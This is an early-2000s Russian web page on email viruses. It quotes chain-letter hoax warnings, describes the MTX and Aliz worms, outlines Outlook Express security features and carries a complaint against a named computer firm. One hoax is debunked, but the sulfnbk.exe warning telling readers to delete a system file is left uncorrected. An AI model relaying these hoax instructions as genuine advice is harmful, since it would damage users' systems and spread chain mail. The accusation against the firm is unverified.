14. Win32/Statik - 0,98 %
15. Win32/Conficker.Gen~alg - 0,96 %
16. Win32/Conficker.AB - 0,88 %
17. Win32/VB.NUB - 0,82 %
18. Win32/Packed.Themida - 0.81 %
19. JS/Exploit.Agent.AFH - 0,79 %
20. Win32/Adware.Virtumonde.NEO~datafile - 0,78 %

Ниже приводятся некоторые предупреждения "пострадавших" от вирусов пользователей.

> Предупреждение!!!!!

From: info WT
To: 2B3
Sent: Thursday, December 12, 2002 11:28 AM
Subject: Fw: Вирус!!!
ПРЕДУПРЕЖДЕНИЕ О ВИРУСЕ !!!!!!!!!!!
К нам пришло письмо, что по сети гуляет вирус.
Название этой небольшой программки:jdbgmgr.exe.
Она сидит в компьютере 14 дней, а потом запускается.
Вам нужно сделать следующее:
Нажмите "Пуск", затем "Найти", затем "Файлы и папки".
Введите имя файла jdbgmgr.exe
Укажите поиск на всех жестких дисках, если у вас их несколько.
Нажмите "Найти". У этого файла будет иконка в виде медвежонка.
НЕ ОТКРЫВАЙТЕ ЕГО!!!
В меню "Правка" этого окна поиска выделите строку меню "Выделить все", чтобы выделить файл, не открывая его.
В меню "Файл" нажмите "Удалить". Теперь эта программка находится в корзине для удаленных файлов. Откройте Корзину и удалите этот файл оттуда также.
ЕСЛИ ВЫ НАШЛИ ЭТУ ПРОГРАММУ НА ВАШЕМ КОМПЬЮТЕРЕ, ТО ПЕРЕШЛИТЕ ЭТО ПИСЬМО ВСЕМ АДРЕСАТАМ ВАШЕЙ АДРЕСНОЙ КНИГИ ТОЙ ПРОГРАММЫ ПОЧТОВЫХ СООБЩЕНИЙ,КОТОРОЙ ВЫ ПОЛЬЗУЕТЕСЬ. ДЛЯ ЭТОГО СОЗДАЙТЕ НОВОЕ СООБЩЕНИЕ, А ЗАТЕМ В ПОЛЕ "КОМУ" СКОПИРУЙТЕ ВСЕ АДРЕСА.
СКОПИРУЙТЕ ТЕКСТ ЭТОГО СООБЩЕНИЯ В ВАШЕ СОЗДАННОЕ.
НАЖМИТЕ "ОТПРАВИТЬ".
Этот вирус самостоятельно рассылается всем адресатам, находящимся в вашей адресной книги!!!
тел.328-24-03, факс 327-74-46
e-mail: spravka@327-78-78.spb.ru
www.327-78-78.spb.ru

Появился новый интернет-вирус Myparty, распространяющийся по электронной почте. Файл-носитель вируса искусно замаскирован под адрес веб-сайта. Зараженные письма выглядят следующим образом: Заголовок: new photos from my party! Текст: Hello! My party... It was absolutely amazing! I have attached my web page with new photos! If you can please make color prints of my photos. Thanks! Имя вложения: www.myparty.yahoo.com Файл-носитель вируса искусно замаскирован под адрес веб-сайта. Ставка сделана на уверенность пользователя в том, что при двойном щелчке на вложении он попадет на некий адрес в Интернете. Однако на самом деле, при его запуске на компьютере активизируется вредоносная программа.

"Уважаемые профессионалы туристического бизнеса. Служба электронной рассылки бюллетеня "I.S.O.T." предупреждает Вас о распространении нового вируса, автоматически рассылающим себя с компьютеров по имеющимся там электронным адресам. После получения данного вируса с чужой почтой - он активизируется через 14 дней и повреждает жесткий диск!!! Рекомендация -как удалить вирус приводится ниже. 1. В меню "Пуск" выбрать "Найти"-"Файлы и папки" 2. В строке поиска набрать sulfnbk.exe - это тело вируса. 3. В строке "Где искать" выбрать "Мой компьютер" 4. Нажать "Найти" 5. Если этот файл будет найден (черная иконка), ни в коем случае не запускайте его!!! 6. Кликните правой кнопкой мыши по файлу, в ниспадающем меню выберите "Удалить" - удалите его таким способом. 7. После этой операции очистите корзину. Если этот файл будет обнаружен на Вашем компьютере, отошлите это сообщение по адресам вашей адресной книги. Извините за причиненное беспокойство. Желаем всем "не болеть" перед праздниками. Удачи!"

> > Всем пользователям Email !
> Если Вы получаете письмо с названием "It Takes Guts to Say 'Jesus"
> НЕ   открывайте его. Это приведет к удалению всей информации
> на вашем жестком диске. Доведите эту информацию до всех, кого Вы  знаете.
> Это новый, очень вредный вирус и почти никто не слышал о нем. Эта  информация была получена от фирмы IBM; пожалуйста, поделитесь этим  с каждым, кто имеет доступ к Internet. Разошлите это сообщение   КАЖДОМУ из вашей адресной книги для того, чтобы остановить эту  заразу. А > также, не открывайте и даже не смотрите любую почту, которая имеет  статус
> "RETURNED OR UNABLE TO DELIVER". Этот вирус прикрепит себя к вашим  компьютерным компонентам и сделает невозможным их использование.
> Немедленно удалите любые письма, которые обладают этими признаками.  Это  очень   опасный вирус и на данный момент нет НИКАКОГО способа устранения  данного  вируса и его последствий. Пожалуйста, примите меры   предосторожности и
> разошлите эту информацию всем вашим коллегам и друзьям.
> *****************************************
> Unitravel Agency, 18, Pushkin St.,
> Khabarovsk 680030, Russia.
> tel.(7-4212) 39-34-77
> fax(7-4212) 79-35-39
> New e-mail: alex@uni.khv.ru <mailto:alex@uni.khv.ru>

| > Subject:  Внимание!! Опасность !! Вирус!!
| > Пришло сообщение.!!

| >  Кто-то рассылает очень <хорошую> экранную заставку, Budweiser
| > Frogs"BUDDYLST.ZIP". Если вы её загрузите, вы потеряете все!!! Ваш | >  жесткий диск будет поврежден и любой получит имя и пароль вашего экрана  |
| > Интернета. НЕ ЗАГРУЖАЙТЕ ЕГО НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ!!! Он поступил
| >  в обращение вчера, насколько мы можем судить. Пожалуйста, разошлите это
| > сообщение. Это новый, очень <вредный> вирус и немногие о нем знают. Эта
| > информация поступила вчера утром от компании Microsoft.
| > Пожалуйста, поделитесь этой информацией со всеми, кто имеет
| > доступ в Интернет. И еще раз, передайте эту информацию всем, кто
| > находится  в вашем списке адресов для того,чтобы предотвратит нежелательное.
| > AOL говорит, что это очень опасный вирус и не существует средств
| > защиты от него в данный период времени.
| > Пожалуйста, предпримите все предостерегающие меры и перешлите это
| > сообщение всем вашим друзьям, с которыми вы поддерживаете связь
| > в on-line.
| > Если вы получите email, озаглавленный "It Takes Guts to Say Jesus", не
| > открывайте его. Он сотрет всю информацию на жестком диске.
| > Перешлите это письмо как можно большему количеству людей. Это новый,
| > очень <вредный> вирус и немногие люди знают о нем. Эта информация
| поступила | > вчера утром от компании IBM; пожалуйста, поделитесь ею со всеми кто имеет   доступ в Интернет. И еще раз, передайте эту информацию всем, кто
| > находится в вашем списке адресов для того, чтобы предотвратить
| > нежелательное.
| > AOL говорит, что это очень опасный вирус и не существует средств
| > защиты от него в данный период времени.
| > Сообщение принято от Абак-пресс 24-05-99.
| >
| > Господа, позвольте сказать несколько
слов, про вирусы и электронную почту.
Вот сейчас пришло письмо про заставку
Будвайзер, с просьбой переслать его
дальше...
Уверен, что в течении нескольких дней
ваша почта будет то и дело получать
такого рода предупреждения, а это
потраченное время и доп. деньги
провайдеру.
Во избежании таких обвалов почты,
придерживайтесь следующих правил:
1. Никогда не пересылайте письма в
которых написано нечто вроде "передай
дальше...".
2. Когда получаете письмо с устрашающим
описанием вируса, не поленитесь,
загляните в Интернет и посмотрите, что
про него пишут. Дело в том, что
последнее время появились так называемые
HOAX, это сообщения о вирусах или
безобидные вирусы. Цель этих HOAX
(хаос), одна испугать и устроить e-mail
панику.
3. Возьмите за правило проверять на
вирусы все новые файлы с расширением
.exe. Но то, что чтение почты или
распаковка архива могут заразить ваш
компьютер - это бред.

Орлов Юлий
Туристская Информационная Система
From  : Travel agency "Islands of Summer"
E-mail : island@corbina.ru     
__________________________________________________

ВНИМАНИЕ! НЕ ОТКРЫВАТЬ С ЗАГОЛОВКОМ " ILOVEYOU removal" С СОДЕРЖАНИЕМ "kindly check the attached LOVELETTER coming from me"- ЭТО СТРАШНЫЙ ВИРУС, ПОСЛЕ АКТИВАЦИИ ВИРУСА МЕНЯЕТСЯ ДОМАШНЯЯ СТРАНИЦА И ПРЕДЛАГАЕТСЯ СКАЧАТЬ ПРОГРАММУ win-bugsfix.exe. НЕ ДЕЛАЙТЕ ЭТОГО, НЕ ПОЛЬЗУЙТЕСЬ Explorer ДО ЛЕЧЕНИЯ И УДАЛИТЕ КЛЮЧИ: W/S/RUNDLL.VBS, /MSKerne132.vbs, /WinFAT322.exe, /WIN-Bugsfix/exe

Итак, БОЛЬШОЕ НАДУВАТЕЛЬСТВО И МИСТИФИКАЦИЯ - ЭТО ПИСЬМО,

которое уж второй раз за последний месяц посещает меня:

==============================================================

Subject: внимание- вирус

ПРЕДУПРЕЖДЕНИЕ О ВИРУСЕ !!!!!!!!!!!
> > > К нам пришло письмо, что по сети гуляет вирус.
> > > Название этой небольшой программки:jdbgmgr.exe.
> > > Она сидит в компьютере 14 дней, а потом запускается.
> > > Вам нужно сделать следующее:
> > > Нажмите "Пуск", затем "Найти", затем "Файлы и папки".
> > > Введите имя файла jdbgmgr.exe
> > > Укажите поиск на всех жестких дисках, если у вас их несколько.
> > > Нажмите "Найти". У этого файла будет иконка в виде медвежонка.
> > > НЕ ОТКРЫВАЙТЕ ЕГО!!!
> > > Правой кнопкой мыши щелкните по файлу, чтобы
> > > выделить файл, не открывая его.
> > > В меню "Файл" нажмите "Удалить". Теперь эта программка находится в
> > > корзине для удаленных файлов. Откройте Корзину и удалите этот файл
> > > оттуда также.
> > > ЕСЛИ ВЫ НАШЛИ ЭТУ ПРОГРАММУ НА ВАШЕМ КОМПЬЮТЕРЕ, ТО ПЕРЕШЛИТЕ ЭТО
ПИСЬМО ВСЕМ АДРЕСАТАМ ВАШЕЙ АДРЕСНОЙ КНИГИ
ТОЙ ПРОГРАММЫ ПОЧТОВЫХ СООБЩЕНИЙ, КОТОРОЙ ВЫ ПОЛЬЗУЕТЕСЬ. ДЛЯ ЭТОГО СОЗДАЙТЕ
НОВОЕ СООБЩЕНИЕ, А ЗАТЕМ В ПОЛЕ "КОМУ" СКОПИРУЙТЕ ВСЕ АДРЕСА.
СКОПИРУЙТЕ ТЕКСТ ЭТОГО СООБЩЕНИЯ В ВАШЕ СОЗДАННОЕ. НАЖМИТЕ "ОТПРАВИТЬ".
Этот вирус самостоятельно рассылается всем адресатам, находящимся в вашей
адресной книге!!!
===============================================================

Конец письма. Теперь комментарии специалиста:

Ни боже мой Вам следовать всей вышеприведенной белиберде: никакие программки сами не запускаются - ни через 14 дней, ни через 14 лет. Эти программки могут быть запущены только какими-нибудь ручонками - и весь сказ!

Оставьте бедного мишку в покое! Это штатный исполнительный файл системы Windows98, нормальный системный файл, так назыв. Microsoft® Debugger Registrar for Java. Может сразу файлы региста грохнуть! На пять минут полегчает, а потом можно Винды по новой ставить!

===============================================================

Best regards,

Администратор службы Tour Info Service

Вы можете регулировать уровень безопасности, используя меню Настройки -Безопасность. В этом разделе Вы можете увидеть адрес и время последнего доступа к ящику.
Включите, пожалуйста, опцию "Запретить кэширование страниц" в меню
Настройки - Безопасность.
Старайтесь регулярно очищать кэш броузера и обязательно используйте кнопку "Выход". Все это может стать причиной утечки информации в Вашем почтовом ящике.
Дополнительную информацию о правилах безопасности Вы можете найти на странице http://www.mail.port.ru/pages/security.html

С уважением,
Ткач Александра
Техническая служба PORT.RU
________________________________

Вирусная программа-червь Win95.Matrix.9216/9245,
известная также как I-Worm.MTX
Вирус, кстати, отнюдь не новый - он известен где-то
с конца августа прошлого года.

В принципе, все действительно _зараженное_
этим вирусом может быть вылечено.
Три вспомогательные компоненты, _создаваемые_ этим вирусом
при заражении системы, подлежат безусловному удалению
(т.к. "лечить" в них нечего), это:
win32.dll, ie_pack.exe и mtx_.exe
Первые две являются служебными компонентами вируса
в "чистом" виде, mtx_.exe - троянец.

Общее описание вируса:
---------------------------------------------
Win95.Matrix c одной стороны является именно вирусом и
заражает EXE-программы для Windows (PE EXE).
При заражении прогр. файлов переход на вирусный код внедряется
не в точку входа в программный модуль, а в некоторое
"подходящее" место внутри программы. Из такой технологии
заражения вытекает несколько интересных следствий, в частности -
при запуске такого зараженного файла вирусный код может
и не получить управления, если программная функция, в которой он
"поселился"
не будет вызвана самой программой. Вирус может "годами жить" в таком
файле, пока, наконец, или сама программа, или пользователь, управляющий
ей, не выполнят каких-либо действий,
повлекших за собой передачу управления программной функции, на месте
которой и "живет" этот самый вирус.

Вирус содержит и устанавливает в пораженную систему
троянскую компоненту - она записывается в основной каталог
Windows под именем MTX_.EXE и регистрируется в
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
как SystemBackup=<Основной каталог Windows>\MTX_.EXE
Данный троянец умеет загружать с некоторого сервера
и скрытно запускать в системе новые программные модули,
что, в принципе, открывает возможность своего рода "автоматического"
внедрения на данный компьютер других вирусов и/или троянцев.

Кроме того данный вирус содержит компоненту, обеспечивающую
его распространение по технологии почтовых червей
типа Win32.Spanska.10000 (известного также как "Happy99"):
Win95.Matrix определенным образом модифицирует (заражает) системную
библиотеку wsock32.dll и таким
образом получает возможность контролировать данные, отправляемые
с данного компьютера в Интернет.
С одной стороны вирус использует это, чтобы
рассылать свои копии в электронных письмах: всякий раз, когда
пользователь отправляет электронное письмо, вирус отправляет на тот
же адрес _еще_ одно письмо со вложенным в него зараженным файлом.
С другой стороны, это позволяет вирусу блокировать
отправку электронной почты на адреса всех основных западных
антивирусных компаний (а также блокировать попытки входа на их
web-сайты).

Имя, под которым данный вирус рассылает по e-mail зараженные файлы,
варьируется в зависимости от дня месяца и может быть любым
из след. списка:

README.TXT.pif
I_wanna_see_YOU.TXT.pif
MATRiX_Screen_Saver.SCR
LOVE_LETTER_FOR_YOU.TXT.pif
NEW_playboy_Screen_saver.SCR
BILL_GATES_PIECE.JPG.pif
TIAZINHA.JPG.pif
FEITICEIRA_NUA.JPG.pif
Geocities_Free_sites.TXT.pif
NEW_NAPSTER_site.TXT.pif
METALLICA_SONG.MP3.pif
ANTI_CIH.EXE
INTERNET_SECURITY_FORUM.DOC.pif
ALANIS_Screen_Saver.SCR
READER_DIGEST_LETTER.TXT.pif
WIN_$100_NOW.DOC.pif
IS_LINUX_GOOD_ENOUGH!.TXT.pif
QI_TEST.EXE
AVP_Updates.EXE
SEICHO-NO-IE.EXE
YOU_are_FAT!.TXT.pif
FREE_xxx_sites.TXT.pif
I_am_sorry.DOC.pif
Me_nude.AVI.pif
Sorry_about_yesterday.DOC.pif
Protect_your_credit.HTML.pif
JIMI_HMNDRIX.MP3.pif
HANSON.SCR
FUCKING_WITH_DOGS.SCR
MATRiX_2_is_OUT.SCR
zipped_files.EXE
BLINK_182.MP3.pif

--
C наилучшими пожеланиями, Колядко Михаил,
служба технической поддержки, ДиалогНаука.
------------------------------------------
E-mail: support@DialogNauka.ru
http://www.DialogNauka.ru
------------------------------------

Уважаемые коллеги, уже несколько дней наши почтовые ящики подвергаются массированной вирусной атаке интернет-червем "Aliz". К счастью, наша система защиты предотвратила заражение этим вирусом наших компьютеров. Однако, из-за ошибок в программах Microsoft Outlook Express данный вирус-червь мог само-разослаться по нашей базе данных и попасть к вам. В настоящий момент проблема нами решена, однако мы настоятельно рекомендуем всем незамедлительно проверить свои компьютеры наиболее "свежим" антивирусом, а также скачать "заплатки" к программам Microsoft. "Заплатка", устраняющая данную брешь доступна для загрузки по адресу: http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp С уважением, Технический отдел P.S. Ниже приводим выдержки из статьи, опубликованной на сайте известной антивирусной компании "Касперский" http://www.kaspersky.ru/ : ---------------------------------------------------------------------------------------------------------- Aliz: вторая попытка Интернет-червь Aliz, обнаруженный в мае 2001 года, вызвал эпидемию. "Лаборатория Каперского", ведущий российский разработчик систем информационной безопасности, предупреждает пользователей об активном распространении Интернет-червя Aliz: случаи заражения данным вирусом уже зафиксированы во многих странах мира, особенно много сообщений поступает от российских пользователей. Данная вредоносная программа распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Червь является приложением Windows (PE EXE-файл), имеет размер около 4K. Зараженные письма содержат: Заголовок: различный Текст: пустое HTML-письмо Имя вложения: whatever.exe Для запуска себя из зараженных писем червь использует брешь в системе безопасности почтового клиента (IFRAME), которую также использовал Интернет-червь "Nimda". При этом зараженное вложение активизируется без участия пользователя - при чтении или предварительном просмотре сообщения. При активизации Aliz червь распаковывает свой основной код и передает на него управление. Данный код затем считывает адреса получателей зараженных писем из файла WAB (Windows Address Book), подключается к зарегистрированному в системе SMTP-серверу, отсылает зараженные письма и на этом заканчивает свою работу. Червь не инсталлирует себя в систему и не запускается повторно (за исключением случаев, когда пользователь повторно открывает зараженное вложение). Т.е. является червем "однократного" действия. Червь никак не проявляет своего присутствия в системе. Процедура отсылки зараженных писем содержит неточности, в результате чего червь оказывается неработоспособным на большинстве конфигураций почтовых клиентов и серверов. "Удивительно, что вирус смог вызвать серьезную эпидемию спустя полгода после его обнаружения. Причина проста: пользователи по-прежнему игнорируют элементарные правила компьютерной безопасности и с завидным упорством наступают на одни и те же грабли. Видимо, многочисленные вирусные эпидемии пока так и не научили простым правилам - быть предельно осторожными с электронной корреспонденцией и вовремя устанавливать "заплатки", устраняющие бреши в защите данных используемых программ", - комментирует Евгений Касперский, руководитель антивирусных исследований Лаборатории Касперского.

Для работы с электронной почтой используются почтовые программы:"Outlook Express", "Microsoft Outlook", "The bat" и др.  Если электронное  письмо для Вас, прошедшее много кодировок,  исказилось до неузнаваемости,  Вы можете восстановить первоначальную информацию  с помощью программы Mail Reader v.2.0.

Есть и другие   программы, позволяющие защитить Вашу информацию. Например, защитные системы, программы Kremlin v.2.21(позволяет шифровать/дешифровывать файлы, каталоги), SeNTry 2020 v.2.04 (позволяет создавать шифрованные диски для NT), Win PGP v.6.01 (позволяет вести секретную переписку) и др.   

Ниже приводится описание некоторых средств безопасности от вирусов и несанкционированного использования Вашего почтового ящика.

Средства безопасности Outlook Express
(Обзор)

По мере расширения использования электронной почты и других интерактивных средств в деловом мире стремительно растет количество конфиденциальных данных, передаваемых по сети Интернет. В результате становится актуальной проблема защиты переписки, осуществляемой с помощью электронной почты. К тому же, растущая популярность элементов управления ActiveX, сценариев и приложений, написанных на языке Java, увеличивает риск получения по электронной почте содержимого HTML, которое может незаметно для вас и без вашего согласия считать или изменить информацию, сохраняемую на вашем компьютере.

Outlook Express содержит средства, позволяющие защитить вас от мошенничества, обеспечить защиту информации и предотвратить несанкционированный доступ к вашему компьютеру. Эти средства позволяют получать и отправлять по электронной почте защищенную корреспонденцию и с помощью зон безопасности проверять потенциально опасные сообщения.

Зоны безопасности

Зоны безопасности Internet Explorer 4.0 напоминают визовый режим посещения некоторых стран. Если страна вам доверяет, в вашем паспорте проставляется штамп, разрешающий путешествовать по всей стране. В случае недоверия ваши маршрут и деятельность будут строго ограничены.

Зоны безопасности работают аналогичным образом, позволяя вам управлять доступом к ресурсам вашего компьютера для программ, встроенным в сообщения электронной почты или Web-страницы. Зоны безопасности обеспечивают надежную защиту вашей информации, не прерывая вашей работы постоянно повторяющимися предупреждениями.

Outlook Express позволяет выбрать зону для входящих сообщений: зону Интернета или зону Ограниченных узлов. Выбор зоны зависит от степени вашего беспокойства о возможных действиях активных компонентов (т.е. элементов ActiveX, сценариев и приложений Java) и желания свободно запускать эти компоненты на своем компьютере. Кроме того, для каждой зоны вы можете установить различные уровни защиты: высокий, средний, низкий или определить собственный уровень безопасности.

Для изменения настроек зон безопасности Outlook Express откройте меню Сервис, выберите Параметры затем перейдите на вкладку Безопасность Замечание: изменение настроек зоны Интернета или зоны Ограниченных узлов приведет к изменению аналогичные настроек Internet Explorer и наоборот.

Цифровые удостоверения

Для использования защищенной электронной почты в Outlook Express вам необходимо получить цифровое удостоверение. Цифровые удостоверения (иногда называемые сертификатами) используются для вашей идентификации в сети Интернет, подобно тому, как в повседневной жизни для определения личности используется паспорт или другие документы.

Цифровые удостоверения позволяют подписывать ваши электронные сообщения, чтобы получатель был уверен в том, что письмо действительно получено от вас. Кроме того, цифровые удостоверения позволяют вашим корреспондентам посылать вам зашифрованные сообщения. Дополнительные сведения содержатся в разделе "состояние доверия цифрового удостоверения" справки Outlook Express.

Получение цифрового удостоверения
Цифровые удостоверения выдаются сертифицированными центрами авторизации: организациями, ответственными за выдачу цифровых удостоверений и периодическую проверку их правильности. После получения цифрового удостоверения вы сможете использовать его для подписи собственных писем и передавать вашим корреспондентам для шифровки сообщений.

Verisign, Inc. является первой коммерческой организацией, выдающей цифровые удостоверения, и предпочтительным поставщиком цифровых удостоверений корпорации Microsoft. Благодаря специальному предложению от VeriSign, Пользователи Microsoft Internet Explorer 4.0 могут получить бесплатное испытательное личное цифровое удостоверение, которое можно использовать, для того чтобы убедительно удостоверять свою личность при посылке сообщений друзьям, деловым партнерам и т. п. Чтобы сделать первый шаг к защищенной почте, получите свое собственное цифровое удостоверение.

Использование цифрового удостоверения

Прежде чем отправлять сообщения с цифровой подписью, необходимо связать цифровое удостоверение с учетной записью электронной почты. Чтобы это сделать, откройте меню Сервис и выберите Учетные записи. Выберите учетную запись, с которой будет использоваться цифровое удостоверение, затем нажмите Свойства, и выберите вкладку Безопасность Установите флажок Цифровое удостоверение при отправке сообщений, и нажмите Цифровое удостоверение. Выберите цифровое удостоверение, которое следует связать с данной учетной записью (будут показаны только удостоверения с адресом электронной почты, совпадающим с адресом выбранной учетной записи).

Резервное копирование цифрового удостоверения

Частью цифрового удостоверения является незаменяемый личный ключ, хранящийся на вашем компьютере. При его потере становятся невозможными отправка подписанной и чтение зашифрованной почты с использованием связанного с ключом цифрового удостоверения. Настоятельно рекомендуется создать резервную копию цифрового удостоверения на случай внезапной потери файлов, хранящих цифровое удостоверение. Чтобы создать резервную копию цифрового удостоверения, запустите Internet Explorer, откройте меню Вид и выберите Свойства обозревателя. Перейдите на вкладку Содержание и нажмите кнопку Личные . Кнопки Импорт и Экспорт этой вкладки позволяют управлять цифровыми удостоверениями.

Безопасная электронная почта (e-mail)

После получения цифрового удостоверения вы можете отправлять защищенные сообщения. Outlook Express обеспечивает защиту почты двумя способами: используя цифровые подписи и шифрование сообщений. Цифровая подпись удостоверяет ваше авторство и неприкосновенность содержимого письма. Шифрование гарантирует, что ваше письмо будет прочитано только получателем.

Поскольку Outlook Express использует стандарт S/MIME, ваши корреспонденты, использующие тот же стандарт, смогут прочитать ваше защищенное сообщение. Аналогично и вы можете прочитать любое сообщение, созданное по технологии S/MIME. Встроенные средства защиты электронной почты Outlook Express имеют удобный интерфейс для выполнения следующих задач:

• Отправка сообщений с цифровой подписью. Подписанные цифровой подписью сообщения позволяют получателю удостовериться в вашем авторстве. Чтобы вставить цифровую подпись в сообщение, откройте меню Сервис и выберите Цифровая подпись (или нажмите соответствующую кнопку на панели инструментов сообщения). Для отправки сообщений с цифровой подписью вам необходимо иметь собственное цифровое удостоверение (см. выше).
• Получение сообщений с цифровой подписью. Наличие цифровой подписи в сообщении позволяет вам убедиться в подлинности как самого сообщения, так и его отправителя, и отсутствии подделки в процессе передачи. Подписанные электронные письма обозначаются специальными значками. Любые проблемы (описанные в предупреждениях защиты OutLook Express) указывают на то, что сообщение могло быть подделано или отправлено не тем лицом, которое указано в качестве автора.
• Отправка зашифрованных сообщений. Шифрование сообщения электронной почты предотвращает несанкционированный доступ к его содержимому в процессе передачи. Для шифрования сообщения вам необходимо иметь цифровое удостоверение получателя, которое должно храниться в соответствующем ему элементе адресной книги. Для передачи зашифрованного сообщения откройте меню Сервис и выберите Зашифровать (или нажмите соответствующую кнопку на панели инструментов сообщения).
• Получение зашифрованного сообщения. Получая зашифрованное сообщение, вы можете быть в достаточной мере уверены, что оно никем не прочитано. Outlook Express автоматически расшифрует сообщение при условии, что на компьютере установлено соответствующее цифровое удостоверение.
• Передача цифрового удостоверения. Чтобы ваши корреспонденты могли посылать вам зашифрованные письма, им необходимо предоставить ваше цифровое удостоверение. Для этого достаточно отправить им письмо, подписанное цифровой подписью (см. выше). Outlook Express автоматически включит в письмо ваше цифровое удостоверение.
• Получение цифровых удостоверений других лиц. Для отправки зашифрованных сообщений необходимы цифровые удостоверения получателей. Outlook Express является первой программой электронной почты, позволяющей получать цифровые удостоверения с серверов каталогов. Чтобы найти цифровое удостоверение, откройте меню Правка и выберите Найти людей. Выберите службу каталогов, которая хранит цифровые удостоверения (например, VeriSign), введите в соответствующие поля имя или адрес электронной почты получателя и нажмите кнопку Найти. Выделите сведения в окне результатов и нажмите Добавить в адресную книгу. Существует другой способ получить чье либо цифровое удостоверение: попросить вашего корреспондента прислать вам сообщение, подписанное цифровой подписью. Чтобы извлечь цифровое удостоверение из цифровой подписи и добавить его в адресную книгу, откройте меню Файл и выберите Свойства. Затем выберите Безопасность и нажмите кнопку Добавить в адресную книгу .
• Изменение достоверности цифрового удостоверения. При добавлении цифрового удостоверения в адресную книгу ему присваивается уровень достоверности, отражающий степень вашего доверия лицу, группе или организации, выславшей вам свое цифровое удостоверение. Если владелец цифрового удостоверения сообщит вам о его ненадежности, вы можете изменить уровень достоверности на "Полностью недостоверное". Более подробная информация содержится в разделе "состояние доверия цифрового удостоверения" в справке Outlook Express.

 Уважаемые посетители нашего сервера!

Каждому из Вас когда-либо приходится покупать компьютер или какое-либо компьютерное оборудование. Вы сталкиваетесь с вежливым обращением или хамством,   оборудование могут поменять, которое Вам   не понравилось , или отказываются выполнять реальные претензии, если даже техника не работает. Автор этих строк также сталкивался с различным отношением и предлагает всем желающим поделиться горьким опытом работы с ненадежными компьютерными фирмами, дабы все последующие пользователи и покупатели не совершали ошибок при покупке.

Ненадежные компьютерные фирмы

Одной из таких фирм является фирма "Транс-Америтек"(Гарсон Л.Т.Д.), которая расположена на Юго-Западе г.Москвы (в "Дельфине"). Эта фирма предоставляет некачественный товар и отказывается его менять. Фирма обманывает клиентов. Так, мы приобрели   модем Телепорт, которые не подходил к нашей АТС. Зам.директора Титов (который ранее был уволен из одной из компьютерных фирм за непригодность к работе) способен оскорбить посетителя и даже, женщину. Мы отдали модем Телепорт на проверку, а они и его нам не вернули, и деньги не возвратили. Вообщем, если не хотите иметь головной боли и дополнительных проблем за свои уплаченные деньги, поищите технику в другом месте. Желаем успеха!
------------------------------------

Для  выполнения   приемов по защите своей информации необходимо изучить "Руководство пользователя по обеспечению безопасности пpи pаботе на компьютеpе"

На Главную страницу